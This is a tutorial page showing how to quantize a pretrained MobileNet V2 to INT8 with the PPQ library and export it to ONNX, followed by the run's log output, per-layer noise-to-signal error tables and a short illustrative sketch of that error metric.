2.1 PPQ quantization: PyTorch -> ONNX

Preface

Load a model from torchvision, convert it to ONNX format, and export the quantized graph.

Code

from typing import Iterable

import torch
import torchvision
from torch.utils.data import DataLoader

from ppq import BaseGraph, QuantizationSettingFactory, TargetPlatform
from ppq.api import export_ppq_graph, quantize_torch_model

BATCHSIZE = 32
INPUT_SHAPE = [3, 224, 224]
DEVICE = 'cuda' # only cuda is fully tested :(  For other executing device there might be bugs.
PLATFORM = TargetPlatform.PPL_CUDA_INT8  # identify a target platform for your network.

def load_calibration_dataset() -> Iterable:
    return [torch.rand(size=INPUT_SHAPE) for _ in range(32)]

def collate_fn(batch: torch.Tensor) -> torch.Tensor:
    return batch.to(DEVICE)

# Load a pretrained mobilenet v2 model
model = torchvision.models.mobilenet.mobilenet_v2(pretrained=True)
model = model.to(DEVICE)

# create a setting for quantizing your network with PPL CUDA.
quant_setting = QuantizationSettingFactory.pplcuda_setting()
quant_setting.equalization = True # use layerwise equalization algorithm.
quant_setting.dispatcher   = 'conservative' # dispatch this network in conservative way.

# Load training data for creating a calibration dataloader.
calibration_dataset = load_calibration_dataset()
calibration_dataloader = DataLoader(
    dataset=calibration_dataset,
    batch_size=BATCHSIZE, shuffle=True)

# quantize your model.
quantized = quantize_torch_model(
    model=model, calib_dataloader=calibration_dataloader,
    calib_steps=32, input_shape=[BATCHSIZE] + INPUT_SHAPE,
    setting=quant_setting, collate_fn=collate_fn, platform=PLATFORM,
    onnx_export_file='./onnx.model', device=DEVICE, verbose=0)

# Quantization Result is a PPQ BaseGraph instance.
assert isinstance(quantized, BaseGraph)

# export quantized graph.
export_ppq_graph(
    graph=quantized, platform=PLATFORM,
    graph_save_to='./quantized(onnx).onnx',
    config_save_to='./quantized(onnx).json')

# analyse quantization error brought in by every layer
from ppq.quantization.analyse import layerwise_error_analyse, graphwise_error_analyse

graphwise_error_analyse(
    graph=quantized, # ppq ir graph
    running_device=DEVICE, # cpu or cuda
    method='snr',  # the metric is signal noise ratio by default, adjust it to 'cosine' if that's desired
    steps=32, # how many batches of data will be used for error analysis
    dataloader=calibration_dataloader,
    collate_fn=lambda x: x.to(DEVICE)
)

layerwise_error_analyse(
    graph=quantized,
    running_device=DEVICE,
    method='snr',  # the metric is signal noise ratio by default, adjust it to 'cosine' if that's desired
    steps=32,
    dataloader=calibration_dataloader,
    collate_fn=lambda x: x.to(DEVICE)
)

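Results

The script loads the pretrained MobileNet V2 model and ends up generating three files: the intermediate ONNX export ./onnx.model, the quantized graph ./quantized(onnx).onnx, and the quantization config ./quantized(onnx).json.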
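To confirm that a run actually produced those three files, a small check along the following lines may help. This is only a sketch: the file names are taken from the script above, while the helper `missing_outputs` and the constant `EXPECTED_OUTPUTS` are hypothetical names introduced here and are not part of PPQ.

```python
from pathlib import Path

# File names copied from the quantization script; the helper is hypothetical.
EXPECTED_OUTPUTS = ("onnx.model", "quantized(onnx).onnx", "quantized(onnx).json")


def missing_outputs(workdir: str = ".") -> list:
    """Return the expected output files that are absent or empty in workdir."""
    root = Path(workdir)
    return [
        name
        for name in EXPECTED_OUTPUTS
        if not (root / name).is_file() or (root / name).stat().st_size == 0
    ]


if __name__ == "__main__":
    missing = missing_outputs(".")
    print("all outputs present" if not missing else f"missing: {missing}")
```

Treating an empty file as missing is a deliberate choice here, since an interrupted export can leave a zero-byte file behind.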

# python example.py
      ____  ____  __   ____                    __              __
     / __ \/ __ \/ /  / __ \__  ______ _____  / /_____  ____  / /
    / /_/ / /_/ / /  / / / / / / / __ `/ __ \/ __/ __ \/ __ \/ /
   / ____/ ____/ /__/ /_/ / /_/ / /_/ / / / / /_/ /_/ / /_/ / /
  /_/   /_/   /_____\___\_\__,_/\__,_/_/ /_/\__/\____/\____/_/

[07:04:00] PPQ Layerwise Equalization Pass Running ... 2 equalization pair(s) was found, ready to run optimization.
Layerwise Equalization: 100%|█████████████████████████████████████████████████████████| 10/10 [00:00<00:00, 1274.01it/s]
Finished.
[07:04:00] PPQ Quantization Config Refine Pass Running ... Finished.
[07:04:00] PPQ Quantization Fusion Pass Running ...        Finished.
[07:04:00] PPQ Quantize Point Reduce Pass Running ...      Finished.
[07:04:00] PPQ Parameter Quantization Pass Running ...     Finished.
Calibration Progress(Phase 1): 100%|████████████████████████████████████████████████████| 32/32 [01:59<00:00,  3.74s/it]
[07:04:00] PPQ Runtime Calibration Pass Running ...        Finished.
[07:06:00] PPQ Quantization Alignment Pass Running ...     Finished.
[07:06:00] PPQ Passive Parameter Quantization Running ...  Finished.
[07:06:00] PPQ Parameter Baking Pass Running ...           Finished.
--------- Network Snapshot ---------
Num of Op:                    [100]
Num of Quantized Op:          [100]
Num of Variable:              [277]
Num of Quantized Var:         [277]
------- Quantization Snapshot ------
Num of Quant Config:          [386]
BAKED:                        [53]
OVERLAPPED:                   [125]
SLAVE:                        [20]
ACTIVATED:                    [65]
PASSIVE_BAKED:                [53]
FP32:                         [70]
Network Quantization Finished.
Analysing Graphwise Quantization Error(Phrase 1):: 100%|██████████████████████████████████| 1/1 [00:00<00:00,  8.19it/s]
Analysing Graphwise Quantization Error(Phrase 2):: 100%|██████████████████████████████████| 1/1 [00:00<00:00,  6.84it/s]
Layer     | NOISE:SIGNAL POWER RATIO 
Conv_8:   | ████████████████████ | 1.678653
Conv_26:  | ████████████████     | 1.313450
Conv_9:   | █████████████        | 1.087763
Conv_13:  | █████████████        | 1.074564
Conv_55:  | ████████████         | 0.991271
Conv_28:  | ██████████           | 0.857988
Conv_17:  | ████████             | 0.730895
Conv_154: | ████████             | 0.676669
Conv_22:  | ████████             | 0.659212
Conv_152: | ███████              | 0.618322
Conv_142: | ███████              | 0.582268
Conv_133: | ██████               | 0.534554
Conv_45:  | ██████               | 0.520580
Conv_51:  | █████                | 0.464549
Conv_144: | █████                | 0.441523
Conv_41:  | █████                | 0.414612
Conv_36:  | █████                | 0.411636
Conv_57:  | ████                 | 0.387930
Conv_113: | ████                 | 0.368550
Conv_148: | ████                 | 0.351853
Conv_123: | ████                 | 0.333928
Conv_104: | ████                 | 0.331407
Conv_134: | ███                  | 0.319796
Conv_4:   | ███                  | 0.309758
Conv_138: | ███                  | 0.274523
Conv_125: | ███                  | 0.272312
Conv_32:  | ███                  | 0.269519
Conv_94:  | ███                  | 0.255700
Conv_47:  | ███                  | 0.255035
Conv_129: | ███                  | 0.246983
Conv_18:  | ██                   | 0.222586
Conv_65:  | ██                   | 0.205310
Conv_162: | ██                   | 0.190181
Conv_84:  | ██                   | 0.189721
Conv_90:  | ██                   | 0.183772
Conv_96:  | ██                   | 0.181663
Conv_70:  | ██                   | 0.174435
Conv_163: | ██                   | 0.167765
Conv_115: | ██                   | 0.164749
Conv_100: | █                    | 0.152931
Conv_86:  | █                    | 0.150768
Conv_105: | █                    | 0.148656
Conv_80:  | █                    | 0.134689
Conv_109: | █                    | 0.131509
Conv_37:  | █                    | 0.124499
Conv_119: | █                    | 0.122543
Conv_74:  | █                    | 0.096819
Conv_76:  |                      | 0.072862
Conv_61:  |                      | 0.071023
Conv_0:   |                      | 0.067830
Conv_66:  |                      | 0.064776
Gemm_169: |                      | 0.035677
Conv_158: |                      | 0.032427
Analysing Layerwise quantization error:: 100%|██████████████████████████████████████████| 53/53 [00:01<00:00, 34.86it/s]
Layer     | NOISE:SIGNAL POWER RATIO 
Conv_4:   | ████████████████████ | 0.007448
Conv_22:  | ███                  | 0.001254
Conv_133: | ███                  | 0.000973
Conv_142: | █                    | 0.000488
Conv_152: | █                    | 0.000487
Conv_162: | █                    | 0.000420
Conv_104: | █                    | 0.000372
Conv_8:   | █                    | 0.000269
Conv_65:  | █                    | 0.000214
Conv_113: | █                    | 0.000204
Conv_123: | █                    | 0.000190
Conv_13:  |                      | 0.000183
Conv_41:  |                      | 0.000142
Conv_17:  |                      | 0.000136
Conv_26:  |                      | 0.000113
Conv_36:  |                      | 0.000108
Conv_70:  |                      | 0.000096
Conv_94:  |                      | 0.000092
Conv_109: |                      | 0.000078
Conv_100: |                      | 0.000068
Conv_125: |                      | 0.000066
Conv_119: |                      | 0.000065
Gemm_169: |                      | 0.000064
Conv_55:  |                      | 0.000060
Conv_84:  |                      | 0.000058
Conv_138: |                      | 0.000053
Conv_80:  |                      | 0.000051
Conv_28:  |                      | 0.000050
Conv_45:  |                      | 0.000043
Conv_57:  |                      | 0.000036
Conv_90:  |                      | 0.000034
Conv_105: |                      | 0.000032
Conv_32:  |                      | 0.000032
Conv_144: |                      | 0.000031
Conv_74:  |                      | 0.000027
Conv_96:  |                      | 0.000027
Conv_115: |                      | 0.000026
Conv_154: |                      | 0.000026
Conv_51:  |                      | 0.000024
Conv_0:   |                      | 0.000023
Conv_148: |                      | 0.000022
Conv_86:  |                      | 0.000021
Conv_134: |                      | 0.000021
Conv_66:  |                      | 0.000018
Conv_18:  |                      | 0.000015
Conv_76:  |                      | 0.000012
Conv_129: |                      | 0.000010
Conv_47:  |                      | 0.000009
Conv_61:  |                      | 0.000008
Conv_9:   |                      | 0.000006
Conv_163: |                      | 0.000005
Conv_37:  |                      | 0.000004
Conv_158: |                      | 0.000002
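
Both reports are headed NOISE:SIGNAL POWER RATIO. As far as I understand it, the graphwise numbers reflect error accumulated through the whole quantized network, while the layerwise numbers isolate the error of one layer at a time, which would explain why the first table reaches about 1.68 and the second peaks at about 0.0074. The sketch below shows one way such a ratio can be computed, assuming it is defined as noise power divided by signal power. The helpers `noise_to_signal_ratio` and `fake_quantize_int8` are hypothetical illustrations in plain Python and are not PPQ's implementation.

```python
def noise_to_signal_ratio(reference, quantized):
    """Noise power divided by signal power for two equal-length sequences."""
    if len(reference) != len(quantized):
        raise ValueError("reference and quantized must have the same length")
    noise_power = sum((q - r) ** 2 for r, q in zip(reference, quantized))
    signal_power = sum(r ** 2 for r in reference)
    if signal_power == 0:
        raise ValueError("reference signal has zero power")
    return noise_power / signal_power


def fake_quantize_int8(values):
    """Symmetric per-tensor int8 quantize-dequantize (illustrative only)."""
    max_abs = max(abs(v) for v in values)
    scale = max_abs / 127 if max_abs > 0 else 1.0
    # Round to the nearest integer level, clamp to [-127, 127], then rescale.
    return [max(-127, min(127, round(v / scale))) * scale for v in values]


if __name__ == "__main__":
    fp32_output = [0.5, -1.25, 2.0, 0.03, -0.7]
    int8_output = fake_quantize_int8(fp32_output)
    print(f"{noise_to_signal_ratio(fp32_output, int8_output):.6f}")
```

A ratio of 0 means the quantized output matches the reference exactly, and a ratio of 1 means the error carries as much power as the signal itself, so layers near the top of either table are the first candidates for closer inspection.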
